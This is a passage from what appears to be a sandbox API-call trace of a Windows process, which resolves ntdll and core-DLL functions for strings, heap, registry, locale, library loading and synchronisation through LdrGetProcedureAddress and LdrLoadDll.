ProcedureAddress=0x41efe64*=0x777e4910) returned 0x0 [0312.169] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="wcsrchr" | out: DestinationString="wcsrchr") [0312.170] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="wcsrchr", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777dea00) returned 0x0 [0312.170] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="strcpy_s" | out: DestinationString="strcpy_s") [0312.170] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="strcpy_s", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777e42c0) returned 0x0 [0312.170] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="_wtoi" | out: DestinationString="_wtoi") [0312.170] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="_wtoi", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777dc110) returned 0x0 [0312.170] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlCreateUnicodeStringFromAsciiz" | out: DestinationString="RtlCreateUnicodeStringFromAsciiz") [0312.170] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlCreateUnicodeStringFromAsciiz", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777bd430) returned 0x0 [0312.170] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlCaptureContext" | out: DestinationString="RtlCaptureContext") [0312.171] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlCaptureContext", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777eba70) returned 0x0 [0312.171] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NlsAnsiCodePage" | out: DestinationString="NlsAnsiCodePage") [0312.171] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NlsAnsiCodePage", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x778697d2) returned 0x0 [0312.171] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlImageNtHeader" | out: DestinationString="RtlImageNtHeader") [0312.171] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlImageNtHeader", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x7779ba70) returned 0x0 [0312.171] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlSetLastWin32Error" | out: DestinationString="RtlSetLastWin32Error") [0312.171] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlSetLastWin32Error", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777b8380) returned 0x0 [0312.172] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="strrchr" | out: DestinationString="strrchr") [0312.172] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="strrchr", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777de110) returned 0x0 [0312.172] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtOpenKey" | out: DestinationString="NtOpenKey") [0312.172] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtOpenKey", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d6da0) returned 0x0 [0312.172] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlOpenCurrentUser" | out: DestinationString="RtlOpenCurrentUser") [0312.172] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlOpenCurrentUser", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77785ff0) returned 0x0 [0312.172] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlUnicodeStringToInteger" | out: DestinationString="RtlUnicodeStringToInteger") [0312.172] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlUnicodeStringToInteger", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777c5410) returned 0x0 [0312.172] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlInitUnicodeString" | out: DestinationString="RtlInitUnicodeString") [0312.173] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlInitUnicodeString", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d90a0) returned 0x0 [0312.173] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlAllocateHeap" | out: DestinationString="RtlAllocateHeap") [0312.173] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlAllocateHeap", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77792bd0) returned 0x0 [0312.173] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="NtSetValueKey" | out: DestinationString="NtSetValueKey") [0312.173] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="NtSetValueKey", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777d72a0) returned 0x0 [0312.173] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="swprintf_s" | out: DestinationString="swprintf_s") [0312.173] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="swprintf_s", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777e4620) returned 0x0 [0312.173] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlFreeHeap" | out: DestinationString="RtlFreeHeap") [0312.173] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlFreeHeap", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77790230) returned 0x0 [0312.173] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="sscanf_s" | out: DestinationString="sscanf_s") [0312.174] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="sscanf_s", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777e41e0) returned 0x0 [0312.174] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="_alldiv" | out: DestinationString="_alldiv") [0312.174] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="_alldiv", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777da390) returned 0x0 [0312.174] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="_allmul" | out: DestinationString="_allmul") [0312.174] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="_allmul", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777da530) returned 0x0 [0312.174] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="_aulldvrm" | out: DestinationString="_aulldvrm") [0312.174] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="_aulldvrm", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777da7e0) returned 0x0 [0312.174] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="_chkstk" | out: DestinationString="_chkstk") [0312.175] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="_chkstk", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777da570) returned 0x0 [0312.175] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="_ftol2_sse" | out: DestinationString="_ftol2_sse") [0312.175] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="_ftol2_sse", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777daad0) returned 0x0 [0312.175] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="memcmp" | out: DestinationString="memcmp") [0312.175] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="memcmp", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777dc8e0) returned 0x0 [0312.175] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="memcpy" | out: DestinationString="memcpy") [0312.175] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="memcpy", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777dc940) returned 0x0 [0312.176] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="memset" | out: DestinationString="memset") [0312.176] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="memset", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777dcfe0) returned 0x0 [0312.176] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="_fltused" | out: DestinationString="_fltused") [0312.176] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="_fltused", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x77868060) returned 0x0 [0312.176] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RtlUnwind" | out: DestinationString="RtlUnwind") [0312.176] LdrGetProcedureAddress (in: BaseAddress=0x77760000, Name="RtlUnwind", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777c33a0) returned 0x0 [0312.176] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-localization-l1-2-1.dll" | out: Destination="api-ms-win-core-localization-l1-2-1.dll") returned 1 [0312.176] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-localization-l1-2-1.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.176] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetACP" | out: DestinationString="GetACP") [0312.177] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetACP", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b81ee0) returned 0x0 [0312.177] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetLocaleInfoW" | out: DestinationString="GetLocaleInfoW") [0312.177] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetLocaleInfoW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6a270) returned 0x0 [0312.177] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="IsValidLocale" | out: DestinationString="IsValidLocale") [0312.177] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="IsValidLocale", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b718b0) returned 0x0 [0312.177] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="ConvertDefaultLocale" | out: DestinationString="ConvertDefaultLocale") [0312.177] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="ConvertDefaultLocale", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b92c80) returned 0x0 [0312.177] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="IsDBCSLeadByteEx" | out: DestinationString="IsDBCSLeadByteEx") [0312.178] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="IsDBCSLeadByteEx", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b88620) returned 0x0 [0312.178] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetSystemDefaultLangID" | out: DestinationString="GetSystemDefaultLangID") [0312.178] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetSystemDefaultLangID", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b88b40) returned 0x0 [0312.178] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetUserDefaultLCID" | out: DestinationString="GetUserDefaultLCID") [0312.178] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetUserDefaultLCID", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b780b0) returned 0x0 [0312.178] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="IsDBCSLeadByte" | out: DestinationString="IsDBCSLeadByte") [0312.178] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="IsDBCSLeadByte", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b76590) returned 0x0 [0312.178] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetCPInfo" | out: DestinationString="GetCPInfo") [0312.178] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetCPInfo", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b766b0) returned 0x0 [0312.178] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetOEMCP" | out: DestinationString="GetOEMCP") [0312.179] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetOEMCP", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b9beb0) returned 0x0 [0312.179] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetThreadLocale" | out: DestinationString="GetThreadLocale") [0312.179] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetThreadLocale", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b82f80) returned 0x0 [0312.179] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-registry-l1-1-0.dll" | out: Destination="api-ms-win-core-registry-l1-1-0.dll") returned 1 [0312.179] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-registry-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.179] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RegOpenCurrentUser" | out: DestinationString="RegOpenCurrentUser") [0312.179] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="RegOpenCurrentUser", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b82e40) returned 0x0 [0312.179] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RegOpenKeyExW" | out: DestinationString="RegOpenKeyExW") [0312.180] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="RegOpenKeyExW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b63680) returned 0x0 [0312.180] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RegQueryValueExW" | out: DestinationString="RegQueryValueExW") [0312.180] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="RegQueryValueExW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b630f0) returned 0x0 [0312.180] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RegGetValueW" | out: DestinationString="RegGetValueW") [0312.180] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="RegGetValueW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b62d00) returned 0x0 [0312.180] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RegEnumValueW" | out: DestinationString="RegEnumValueW") [0312.180] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="RegEnumValueW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b61e00) returned 0x0 [0312.180] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RegDeleteKeyExW" | out: DestinationString="RegDeleteKeyExW") [0312.180] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="RegDeleteKeyExW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b9a8b0) returned 0x0 [0312.180] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RegCreateKeyExW" | out: DestinationString="RegCreateKeyExW") [0312.181] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="RegCreateKeyExW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b61b20) returned 0x0 [0312.181] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RegCloseKey" | out: DestinationString="RegCloseKey") [0312.181] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="RegCloseKey", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b644c0) returned 0x0 [0312.181] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RegNotifyChangeKeyValue" | out: DestinationString="RegNotifyChangeKeyValue") [0312.181] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="RegNotifyChangeKeyValue", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b60940) returned 0x0 [0312.181] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RegSetValueExW" | out: DestinationString="RegSetValueExW") [0312.181] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="RegSetValueExW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b61710) returned 0x0 [0312.181] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="RegQueryInfoKeyW" | out: DestinationString="RegQueryInfoKeyW") [0312.182] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="RegQueryInfoKeyW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b611f0) returned 0x0 [0312.182] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-heap-l2-1-0.dll" | out: Destination="api-ms-win-core-heap-l2-1-0.dll") returned 1 [0312.182] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-heap-l2-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.182] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="LocalReAlloc" | out: DestinationString="LocalReAlloc") [0312.182] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="LocalReAlloc", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b767e0) returned 0x0 [0312.182] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalFree" | out: DestinationString="GlobalFree") [0312.182] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GlobalFree", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7ca20) returned 0x0 [0312.182] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="LocalLock" | out: DestinationString="LocalLock") [0312.183] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="LocalLock", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b79d20) returned 0x0 [0312.183] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="LocalFree" | out: DestinationString="LocalFree") [0312.183] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="LocalFree", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b673c0) returned 0x0 [0312.183] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="LocalUnlock" | out: DestinationString="LocalUnlock") [0312.183] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="LocalUnlock", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b79e20) returned 0x0 [0312.183] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GlobalAlloc" | out: DestinationString="GlobalAlloc") [0312.183] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GlobalAlloc", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7c300) returned 0x0 [0312.183] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="LocalAlloc" | out: DestinationString="LocalAlloc") [0312.184] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="LocalAlloc", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b69fc0) returned 0x0 [0312.184] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-libraryloader-l1-2-0.dll" | out: Destination="api-ms-win-core-libraryloader-l1-2-0.dll") returned 1 [0312.184] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-libraryloader-l1-2-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.184] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="SizeofResource" | out: DestinationString="SizeofResource") [0312.184] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="SizeofResource", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b74fe0) returned 0x0 [0312.184] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetModuleHandleExW" | out: DestinationString="GetModuleHandleExW") [0312.184] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetModuleHandleExW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b701c0) returned 0x0 [0312.184] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="LoadResource" | out: DestinationString="LoadResource") [0312.185] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="LoadResource", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b74d20) returned 0x0 [0312.185] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="LoadLibraryExW" | out: DestinationString="LoadLibraryExW") [0312.185] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="LoadLibraryExW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6e740) returned 0x0 [0312.185] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetProcAddress" | out: DestinationString="GetProcAddress") [0312.185] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b70b70) returned 0x0 [0312.185] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="FindResourceExW" | out: DestinationString="FindResourceExW") [0312.185] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="FindResourceExW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b74de0) returned 0x0 [0312.185] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="FreeLibrary" | out: DestinationString="FreeLibrary") [0312.185] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="FreeLibrary", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6f230) returned 0x0 [0312.185] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetModuleFileNameW" | out: DestinationString="GetModuleFileNameW") [0312.186] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetModuleFileNameW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7cbf0) returned 0x0 [0312.186] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetModuleHandleW" | out: DestinationString="GetModuleHandleW") [0312.186] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetModuleHandleW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b6c850) returned 0x0 [0312.186] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="DisableThreadLibraryCalls" | out: DestinationString="DisableThreadLibraryCalls") [0312.186] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="DisableThreadLibraryCalls", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b82750) returned 0x0 [0312.186] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetModuleHandleA" | out: DestinationString="GetModuleHandleA") [0312.186] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetModuleHandleA", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b703d0) returned 0x0 [0312.186] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetModuleFileNameA" | out: DestinationString="GetModuleFileNameA") [0312.186] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetModuleFileNameA", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7cb10) returned 0x0 [0312.186] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="EnumResourceNamesExW" | out: DestinationString="EnumResourceNamesExW") [0312.187] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="EnumResourceNamesExW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b87d70) returned 0x0 [0312.187] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-string-l1-1-0.dll" | out: Destination="api-ms-win-core-string-l1-1-0.dll") returned 1 [0312.187] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-string-l1-1-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.187] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CompareStringOrdinal" | out: DestinationString="CompareStringOrdinal") [0312.187] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CompareStringOrdinal", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b5eb40) returned 0x0 [0312.187] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="GetStringTypeW" | out: DestinationString="GetStringTypeW") [0312.187] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="GetStringTypeW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7a0d0) returned 0x0 [0312.187] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="MultiByteToWideChar" | out: DestinationString="MultiByteToWideChar") [0312.188] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="MultiByteToWideChar", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b66940) returned 0x0 [0312.188] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="WideCharToMultiByte" | out: DestinationString="WideCharToMultiByte") [0312.188] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="WideCharToMultiByte", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b77300) returned 0x0 [0312.188] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="FoldStringW" | out: DestinationString="FoldStringW") [0312.188] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="FoldStringW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b928c0) returned 0x0 [0312.188] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="CompareStringW" | out: DestinationString="CompareStringW") [0312.188] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="CompareStringW", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b68dd0) returned 0x0 [0312.188] RtlCreateUnicodeStringFromAsciiz (in: Destination=0x41efe4c, Source="api-ms-win-core-synch-l1-2-0.dll" | out: Destination="api-ms-win-core-synch-l1-2-0.dll") returned 1 [0312.188] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="api-ms-win-core-synch-l1-2-0.dll", BaseAddress=0x41efe6c | out: BaseAddress=0x41efe6c*=0x75ac0000) returned 0x0 [0312.188] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="SetEvent" | out: DestinationString="SetEvent") [0312.189] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="SetEvent", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7c4d0) returned 0x0 [0312.189] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="ReleaseSRWLockExclusive" | out: DestinationString="ReleaseSRWLockExclusive") [0312.189] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="ReleaseSRWLockExclusive", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x777ad080) returned 0x0 [0312.189] RtlInitAnsiString (in: DestinationString=0x41efe44, SourceString="WaitForMultipleObjectsEx" | out: DestinationString="WaitForMultipleObjectsEx") [0312.189] LdrGetProcedureAddress (in: BaseAddress=0x75ac0000, Name="WaitForMultipleObjectsEx", Ordinal=0x0, ProcedureAddress=0x41efe64 | out: ProcedureAddress=0x41efe64*=0x75b7a220) returned 